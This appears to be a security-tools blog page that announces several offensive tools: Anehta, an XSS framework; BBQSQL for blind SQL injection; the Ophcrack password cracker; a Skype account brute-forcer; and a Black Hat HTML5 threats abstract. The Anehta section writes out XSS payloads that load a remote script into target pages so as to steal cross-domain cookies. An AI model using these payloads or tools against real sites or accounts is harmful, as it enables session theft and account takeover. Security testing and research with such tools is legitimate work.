Anehta V-0.6 released.

Anehta is Web Application tools for Security Audit.

 

=== Enviroment ===
1. PHP4/5 (PHP5 is recommended)
2. Apache or IIS
=== Install & Configure ===
1. Decompress all the files in a directory on your server
2. Make sure your directory has the write permission.
3. Modify $U as username and $P as password in “server/class/auth_Class.php” file.
Default username is “admin” and default password is “123456”.
4. If you want to send mail, modify “server/mail.php” file to your own mail server or mailbox.
=== Quick Start ===
1. Login and turn to the Configure tab.
2. Input the “anehtaurl” as the url where your anehta is.
For example: “http://www.a.com/anehta”.
3. You should also input the boomerang src and boomerang target.
boomerang src is usually the same page where you put your feed.js is.
For example: boomerang src maybe: “http://www.b.com/xssed.html?param=<script src=http://www.a.com/anehta/feed.js></script>”.

boomerang target must be the page where you want to steal cross domain cookie.
For example: boomerang target maybe: “http://www.alimafia.com/xssDemo.html#’><script src=http://www.a.com/anehta/feed.js></script><‘”.

You can modify feed.js to cancel the xcookie module if you do not want to use boomerang.
But you must always set boomerang src and target values when you modify in the configure tab.

4. After modified configure, simply load feed.js as a external script to where your xss page is.
There is also a demo page in the directory which is “demo.html”

5. Refresh the admin.php, and you may see some changes if your xss slave coming.

Downnload In here | Read more Right here

 

Advertisements

BBQSQL is a blind SQL injection framework written in Python.

Change current released : fixing help menu
Blind SQL injection can be a pain to exploit. When the available tools work they work well, but when they don’t you have to write something custom. This is time-consuming and tedious. BBQSQL can help you address those issues.
BBQSQL is a blind SQL injection framework written in Python. It is extremely useful when attacking tricky SQL injection vulnerabilities. BBQSQL is also a semi-automatic tool, allowing quite a bit of customization for those hard to trigger SQL injection findings. The tool is built to be database agnostic and is extremely versatile. It also has an intuitive UI to make setting up attacks much easier. Python gevent is also implemented, making BBQSQL extremely fast.

Overview of Readme
We tried to write the tool in such a way that it would be very self explanatory when setting up an attack in the UI. However, for sake of thoroughness we have included a detailed Readme that should provide you additional insight on the specifics of each configuration option. One thing to note is that every configuration option in the UI has a description associated with it, so if you do choose to fire up the tool without reading this page you should be able to hack your way through an attack.

High Level Usage
Similar to other SQL injection tools you provide certain request information.

Must provide the usual information:

  • URL
  • HTTP Method
  • Headers
  • Cookies
  • Encoding methods
  • Redirect behavior
  • Files
  • HTTP Auth
  • Proxies

Then specify where the injection is going and what syntax we are injecting. Read on for details.

Install
After you pull the tool from Github, you can install simply by typing:

python setup.py install

Download in here | Read more right here

Ophcrack LiveCD 3.4.0 released

Our Post about Ophcrack Before :

Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman’s original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.


Features

  • Cracks LM and NTLM Windows hashes
  • Free tables available for Windows XP, Vista and 7
  • Brute-force module for simple passwords
  • Audit mode and CSV export
  • Real-time graphs to analyze the passwords
  • LiveCD available to simplify the cracking
  • Loads hashes from encrypted SAM recovered from a Windows partition

Download Version: http://sourceforge.net/projects/ophcrack/files/ophcrack-livecd/3.4.0/
Read more right Here : http://ophcrack.sourceforge.net/

update OPHCRACK 3.4.0 (Time-Memory-Trade-Off-Crack)

Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman’s original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.


Features :

  •     Cracks LM and NTLM Windows hashes
  •     Free tables available for Windows XP, Vista and 7
  •     Brute-force module for simple passwords
  •     Audit mode and CSV export
  •     Real-time graphs to analyze the passwords
  •     LiveCD available to simplify the cracking
  •     Loads hashes from encrypted SAM recovered from a Windows partition

Download Latest Version :
Windows :  ophcrack-win32-installer-3.4.0.exe (5.9 MB)
Unix/Linux :  ophcrack-3.4.0.tar.bz2 (279.8 kB)
For Installation And Other Version Please read here :
http://sourceforge.net/projects/ophcrack/files/ophcrack/3.4.0/

Ophcrack is a free Windows password cracker based on rainbow tables

Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman’s original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.


Features

  • Cracks LM and NTLM Windows hashes
  • Free tables available for Windows XP, Vista and 7
  • Brute-force module for simple passwords
  • Audit mode and CSV export
  • Real-time graphs to analyze the passwords
  • LiveCD available to simplify the cracking
  • Loads hashes from encrypted SAM recovered from a Windows partition

Download Latest Version : http://sourceforge.net/projects/ophcrack/files/
Read more in here : http://ophcrack.sourceforge.net/

HTML5 Top 10 Threats Stealth Attacks and Silent Exploit

Abstract : HTML5 is an emerging stack for next generation applications. HTML5 is enhancing browser capabilities  and able to execute Rich Internet Applications in the context of modern browser architecture.  Interestingly HTML5 can run on mobile devices as well and it makes even more complicated. HTML5 is  not a single technology stack but combination of various components like XMLHttpRequest (XHR),  Document Object model (DOM), Cross Origin Resource Sharing (CORS) and enhanced HTML/Browser  rendering. It brings several new technologies to the browser which were not seen before like  localstorage, webSQL, websocket, webworkers, enhanced XHR, DOM based XPATH to name a few. It has  enhanced attack surface and point of exploitations for attacker and malicious agents. By leveraging  these vectors one can craft stealth attacks and silent exploits, it is hard to detect and easy to  compromise…Read more in here [PDF Format]

Reasourceshttps://media.blackhat.com/

Skype BruteForce Tools V-1.0

With this program you can bruteforce Skype accounts. This is probably the first public Skype bruteforce tool. The developers of Skype are very fast in patching bugs and now there is a one minute anti-bruteforce protection. The only solution is sleep(60) and that is the way that allowto bruteforce a Skype Account, but is very very slow method. This tool is for education purpose only, Use it at you’r own risk.


Platform : Unix/linux

Download : skype.pl (2.3KB) 
Find other version |
Read more in here : http://code.google.com/p/skype-bruteforcer/